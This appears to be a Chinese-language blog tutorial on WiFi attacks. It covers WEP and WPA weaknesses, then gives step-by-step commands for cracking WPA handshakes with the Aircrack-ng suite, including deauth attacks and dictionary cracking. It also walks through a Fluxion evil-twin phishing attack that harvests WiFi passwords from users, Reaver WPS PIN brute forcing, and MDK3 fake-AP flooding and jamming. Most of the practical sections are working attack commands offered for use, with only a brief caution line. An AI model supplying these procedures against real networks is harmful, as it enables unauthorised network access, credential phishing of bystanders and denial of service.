无线攻防：wifi攻防从破解到钓鱼

1.RTL-SDR这是一个低廉的家用消费档次的DVB-T USB接口的接收机的创新发明，一个完全的软件定义无线电。
2. USRP (Universal Software Radio Peripheral，通用软件无线电外设)旨在使普通计算机能像高带宽的软件无线电设备一样工作。从本质上讲，USRP充当了一个无线电通讯系统的数字基带和中频部分。
3. HackRF主要做wei基站!射频范围很宽!
三款SDR平台对比:HackRF， bladeRF和USRP
https://www.cnblogs.com/h2zZhou/p/5484748. html

渗透需谨慎，谨守底线。一、无线网络基础 无线安全是信息安全体系下一门广泛的学科，包括但不限于近场(NFC)、蓝牙(Bluetooth)、射频(RF)、无线局域网(WiFi)、手机蜂窝网络（Cellular)、卫星定位(GPS)等。无线传输在传输、认证、加密等方面，在各种设备对无线网络技术依赖的加深下变得越来越重要；随着物联网(IoT)的持续蓬勃发展，现在手机、智能设备对各类无线模块、传感器的需求也越来越大，蓝牙、GPS、NFC、模块成为必备项。从安全角度对无线网络技术的研究是很有必要的。RTL-SDR、USRP、HackRF、及BladeRF等外设的价格下降，软件环境社区的完善，使现在对无线网络的研究已经不再像以前只能利用2.4GHz的无线网卡进行狭义的“无线”攻防。无线电通信安全将成为信息安全体系重要的一环。

什么是无线网络？无线网络(Wireless Network)是采用无线通信技术实现的网络。无线网络既包括允许用户建立远距离无线连接的全球语音和数据网络，也包括为近距离无线连接进行优化的红外线技术及射频技术。与有线网络的用途十分类似，最大的不同在于传输媒介不同，利用无线电技术取代网线，可以和有线网络互为备份。

二、无线网络的加密方式和破解方式
1、WEP加密及破解
1）WEP加密方式
有线等效保密（Wired Equivalent Privacy，WEP）协议使用RC4（Rivest Cipher 4）串流加密技术保障机密性，并使用CRC-32校验和保密资料的正确性，包含开放式系统认证和共建认证。
2）WEP漏洞及破解
（1）802.2头消息和简单RC4流密码算法。导致攻击者在有客户端并有大量有效通信时，可以分析出WEP的密码。
（2）重复使用。导致攻击者在有客户端少量通信或者没有通信时，可以使用ARP重复的方法获取大量有效的数据。
（3）无身份验证机制，使用线性函数CRC-32进行完整性校验。导致攻击者能使用虚连接和AP建立伪连接，进而获得XOR文件。使用线性函数CRC-32进行完整性校验，导致攻击者用XOR文件伪造一个ARP的包，然后依靠这个包去捕获大量有效数据。
破解WEP加密的无线信号依赖两个元素：1)信号强度 2)是否有在线客户端。通过抓包、注入，然后获取密码，只要有这类信号就是百分之百可以破解的。

2、WPA加密方式
WPA全程为WiFi Protected Access，既WiFi网络安全存取，有WPA和WPA2两个标准，是基于有线等效加密中几个严重的弱点而产生的。WPA加密方式目前有四种认证方式：WPA、WPA-PSK、WPA2、WPA2-PSK。
WPA加密流程如下：
⑴ 无线AP定期发送beacon数据包，使无线终端更新自己的无线网络列表。
(2）无线终端在每个信道(1~13)广播Probe Request(非隐藏类型的WiFi含ESSID，隐藏类型的WiFi不含ESSID)。
(3）每个信道的AP回应，Probe Response，包含ESSID及RSN信息。
(4）无线终端给目标AP发送AUTH包。AUTH认证类型有两种：0为开放式，1为共享式(WPA/WPA2必须是开放式)。
(5) AP回应网卡AUTH包。
(6）无线终端向AP发送关联请求包Association Request数据包。
(7）AP向无线终端发送关联响应包Association Request数据包。
(8) EAPOL四次握手进行认证（握手包是破解的关键）。
(9）完成认证可以上网
2）WPA破解
WPA的WiFi密码破解有两种方法，抓包和跑PIN码。
（1）抓包破解：通过抓取WiFi信号的机密包，可以获取加密的密码。抓包破解的成功与否取决于信号强度、是否有客户端在线、抓包设备的性能以及密码本的质量等因素。
（2）跑PIN码破解：通过WPS（WiFi Protected Setup）功能，可以快速连接具有WPS功能的WiFi设备和无线路由器，并生成一个八位数的PIN码进行机密操作。这种方法省去了手动添加网络名称（SSID）和输入冗长的无线加密密码的繁琐过程。

三、实战例子（一）Aircrack-ng破解WiFi
USB式移动WiFi

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng

ipconfig

Aircrack-ng是一个包含多款工具的套装，我们需要使用其中的几个部分：准备、探测、抓包、攻击、字典、破解。
1、准备阶段-启动wlan0
使用ipconfig命令检查无线网卡wlan0是否启动。

iwconfig（查看无线网卡状态信息）

airmon-ng start wlan0(开启激活网卡)

确保无线网卡当前没有连接任何WiFi。如果wlan0没有IP地址等信息，说明当前没有连接。

2）查看无线网卡状态

3）激活无线网卡至monitor模式，监听模式
我们可以看到上面显示的mac80211 monitor mode vif enabled for wlan0 on wlan0mon……

iwconfig

sudo ifconfig wlan0mon down
sudo iwconfig wlan0mon mode monitor
sudo ifconfig wlan0mon up

airodump-ng wlan0mon

airodump-ng --ivs --bssid F4:6A:92:90:23:6D -w test -c 6 wlan0mon
我们使用airodump-ng这个攻击进行抓包
--bssid是路由器的mac地址
-w 是写入到文件longas中
-c 6 CH频道是6
--ivs 是只抓取可用于破解的IVS数据报文

再次检查网卡状态，我们可以看到网卡的名称已经变为wlan0mon。

拓展命令

2、探测阶段-确定需要攻击的WiFi
利用网卡搜索周围可获取的WiFi信息。可以看到右侧的SSID列下面是周围WiFi的名称，左侧的BSSID列是这些WiFi对应的MAC地址。ENC列是加密方式，可以看到大多数是WPA2加密。我们要破解的是FAST 236D，这是我的WiFi，MAC地址是F4:6A:92:90:23:6D！注意，下半部分的表格会列出连接到这个WiFi的设备的MAC地址，但为了保护隐私，这里不显示。

3、抓包阶段-利用airodump
我们已经找到要攻击的路由器的MAC地址和工作频道。执行以下命令：

需要注意的是，虽然我们设置了保存的文件名为test，但生成的文件不是test.ivs，而是test-01.ivs。观察到STATION部分有两个MAC地址，分别是我电脑和手机连接的这个WiFi网络。如果没有客户端连接AP，airodump-ng是无法抓取数据的。

airodump-ng -c 信道 -w 抓包保存目录 --bssid BSSID地址 wlan0mon网卡
CH:信道
BSSID:F4:6A:92:90:23:XX(wifi的mac)
airodump-ng -c 6 -w testquanliang/ --bssid F4:6A:92:90:23:XX wlan0mon
(抓取全量的包)

aireplay-ng -0 1 -a F4:6A:92:90:23:XX -c A4:02:B9:CC:6D:XX wlan0mon
-0 采用deauth攻击模式，后面跟上攻击次数，这里我设置为1，大家可以根据实际情况设置为10不等
-a 后跟路由器的mac地址
-c 后面跟客户端的mac地址

2）拓展思路抓取CAP包

4、攻击阶段-aireplay
请注意：在新窗口中运行。

1）思路1（方法实用性高）
为了获取破解所需的WPA2握手验证的完整数据包，我们将发送一种称为“Deauth”的数据包，将已连接至无线路由器的合法客户端强制断开，此时客户端会自动重新连接无线路由器，我们也就有机会捕获到包含WPA2握手验证的完整数据包。在这里需要新开启一个shell：

airodump-ng wlan0mon -c 6
参考网站：
https://my.oschina.net/u/1585857/blog/3420946

在这里可能会出现wlan0mon is on channel 13, but the AP uses channel 6问题，这是内核问题，有一个临时的解决方案：设置无线网卡监听信道。通常情况下，使用Aircrack-ng工具进行无线密码破解时，可以通过指定监听数据的工作信道为目标AP工作的信道来解决该问题。由于AP工作信道为6，所以这里需要设置无线网卡监听信道为6。执行以下命令：

aireplay-ng -0 5 -a F4:6A:92:90:23:6D wlan0mon
-0 攻击五次
-a 路由器mac
或者：
aireplay -0 0 -a F4:6A:92:90:23:6D -c A4:02:B9:CC:6D:25 wlan0mon

cd /usr/share/wordlists/
ls -al rockyou.txt

2）思路2-利用aireplay进行攻击：（实用性一般）
条件：此网络需要有用户连接，攻击手段是断开对方的网络，让对方重新连接后，重新抓取握手包，对方重新连接时会自动连接并携带密码key。

出现WPA handshake: F4:6A:92:90:23:6D代表抓包完成！获取到了WiFi包的加密密钥！注意：按两次Q退出，不要强制退出！

注意：如果在执行aireplay攻击后，在airodump-ng界面右上角没有出现“WPA handshake: ……”字样，需要执行“airmon-ng stop wlan0”，然后再次执行aireplay-ng攻击，即可出现。

5、收集阶段-字典攻击cap（字典收集）
1）使用Kali自带的秘钥字典

aircrack-ng -w passwd.txt test-01.ivs

aircrack-ng -w passwd.txt /root/Desktop/testquanliang/-01.cap

2）使用本地的密码本

3）自动生成字典（如crunch等）

6、破解阶段-aircrack破解
1）IVS数据包爆破
此时的破解速度取决于使用的设备性能和字典大小。为了节省时间，我将密码直接加入到字典中了。可以看到破解成功时的界面！中括号中显示的是路由器的WiFi密码。到此，WiFi密码的破解完成。

2）破解CAP包

./fluxion.sh -i

成功破解。

四、实战例子（二）-Fluxion钓鱼破解WiFi
1、Fluxion-钓鱼2.4GHz网络
安装Fluxion并完成所有依赖包的安装。

选择语言。

开始抓包。

选择17进入中文模式。

选择handshake snooper……

选择2.4GHz进行抓包。

可以看到和airodump-ng探测一样的功能。

按两次Q退出后。

选择重置攻击。

选择[2]aireplay-ng解除认证方式（侵略性），因为抓包速度最快。

建议选择1，也可以选择2进行cowpatty验证，因为上一步已经选择了air，所以这里选择1进行破解是最好的。

选择每30秒。

选择2，默认推荐。

选择完成后会跳转出现三个窗口，如果窗口没有数据运行是卡住了，在fluxion窗口下执行ctrl+c结束进程，然后窗口自动关闭，再重新运行即可。

三个窗口进行抓包，抓包后的界面如下：

然后选择1，选择攻击方式。

已经抓到握手包后，开启配置钓鱼页面，然后选择1。

选择Y。

选择2，跳过（一定要选择重置攻击）。

然后选择[2]aireplay-ng解除认证方式（侵略性），因为抓包速度最快。

选择3，无线网卡。

选择3，mk3。

这里2.4GHz虚拟环境下选择mdk3，如果是5GHz选择mdk4。

选择【1】流氓AP-hostapd（推荐）。

选择[1]hash – cowpatty。

选择[1]使用抓取到的hash文件。

选择[2]cowpatty验证（推荐）。

选择[1]创建SSL证书。

选择1]断开原网络（推荐）。

5）钓鱼界面选择

选择3，也可以自定义选择。

选择3后就开始6个窗口，然后就无法连接FAST_236D了，连接此WiFi的全部客户端被踢下线，并弹出六个窗口。

1、只要输入密码，就会显示在第二框白色字体中，包含MAC登录信息。

2、弊端是客户端记住WiFi密码的情况下，连接钓鱼的WiFi会显示修改密码，无法跳转到钓鱼的界面。

3、需要一个没有机密WiFi密码的客户端。连接后会调整服务路由器，请修改密码。

4、第五个绿色框字体会显示连接WiFi的手机型号，如iPhone。

一个没有记住WiFi密码的客户端连接后，钓鱼后台显示的信息。

客户端显示的信息。

输入正确的密码后，自动关闭其余的窗口，只留一个窗口，将显示log文件位置，log文件中包含输入正确的密码。

底层目录详解。

握手包保存的位置。

防止钓鱼界面的目录。

解惑到正确密码保存情况。

获取你连接此WiFi的详细信息和正确密码。

iwconfig wlan0 mode monitor 关闭wlan0
airmon-ng check klii 关闭进程
airmon-ng start wlan0   开启进行即可
现在用airodump-ng使用-C参数指定5G频段的频率。程序会验证一下频率是否正确,正确的话就会进入监听界面了:
airodump-ng -C 5180-5885 wlan0

reave的进度表文件保存在：
1.3版 ：/etc/reaver/MAC地址.wpc
1.4版：/usr/local/etc/reaver/MAC地址.wpc

2、Fluxion-钓鱼5GHz网络
需要等待几分钟。

1）772N攻击钓鱼2.4GHz！

2）air去攻击5GHz，air攻击会导致对方无法连接5G网络！

五、实战例子（三）-Reaver跑PIN码破解WiFi
1、简介
PIN码共有8位，按431分段，总共有11000种组合。通过获取PIN码并记住BSSID和PIN，后期可以通过一条命令爆破无线密码。容易遇到的问题包括连接超时、卡住、路由器自我保护等。

iwconfig
airmon-ng start wlan0

wash -i wlan0mon

reaver -i wlan0monmon -b B4:54:59:5A:DF:F0 -vv

知道Pin码以后使用如下命令饭计算出wifi连接密码：
reaver -i wlan0monmon -b MAC地址 -p Pin码

开始。

2、网卡启动。

3、开启嗅探模式
查看支持WPS的AP。

查看目前MB有没有可以破解的WiFi。MB是54e的可破解，54e不可破解。

4、开启破解跑PIN
最终你就能得到WiFi的PIN码以及密码。记下这两个，一般来说，WiFi主人过段时间会更改密码，但不会更改PIN码，这时我们只要加上-p命令，WiFi密码就能秒出。

mdk3 wlan0monmon b -g -c 6 -h 7
参数结束
b   用于伪造AP时使用的模式;
g   伪造诚提供54M即满足802.11g标准的无线网络
-c  针对的无线工作频道，这里是6;
-h  用于提升攻击效率，只针对个别无线设备有效

总结：此方法受信号强度和WPS保护机制等影响，尝试过几次，信号强度在-70左右，连接超时。

六、实战例子（四）-Mdk3攻击WiFi
1、伪造AP攻击
无线黑客通过创建大量虚假AP基站信号来干扰正常无线通信。具体可以使用MDK3这款工具实战，可以通过无线网卡发射随机伪造的AP信号，并可以根据需要设定伪造的AP工作信道，一般设定为干扰目标AP的同一频道。

mdk3 wlan0mon b -n FAST_SHEN -g -c 10
-n  是使用指定的SSID来替代随机生成的SSID

我们可以看到很多假的AP信号点。

2、SSID无线干扰
对于在某一频道正常工作的无线接入点，攻击者除了可以发送相同频道外，还可以发送相同SSID的无线数据流量信号来扰乱连接该AP的无线客户端的正常运作。